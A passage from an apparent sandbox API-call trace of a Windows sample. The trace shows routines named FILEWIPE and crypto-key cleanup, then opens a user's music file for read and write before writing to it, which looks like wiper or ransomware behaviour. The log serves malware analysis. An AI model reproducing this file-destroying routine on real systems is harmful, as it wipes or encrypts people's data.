wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.823] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.823] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.823] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0187.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.823] CryptDestroyKey (hKey=0x90af98) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.824] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.824] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.824] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0187.824] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.824] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.825] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.825] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.825] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.825] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.826] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0187.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.826] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.826] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0187.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.827] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.827] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.831] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.831] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0187.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b458d70, ftCreationTime.dwHighDateTime=0x1d5e70e, ftLastAccessTime.dwLowDateTime=0xc82411d0, ftLastAccessTime.dwHighDateTime=0x1d5dceb, ftLastWriteTime.dwLowDateTime=0xc82411d0, ftLastWriteTime.dwHighDateTime=0x1d5dceb, nFileSizeHigh=0x0, nFileSizeLow=0x182d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RRCvJ.mp3", cAlternateFileName="")) returned 0x90ae18 [0187.831] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0187.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.832] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.832] CharLowerBuffW (in: lpsz="byte[99028]", cchLength=0xb | out: lpsz="byte[99028]") returned 0xb [0187.832] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.832] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.832] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.832] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.833] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.834] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.835] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.835] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\rrcvj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.836] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0187.836] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.836] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0187.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.837] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 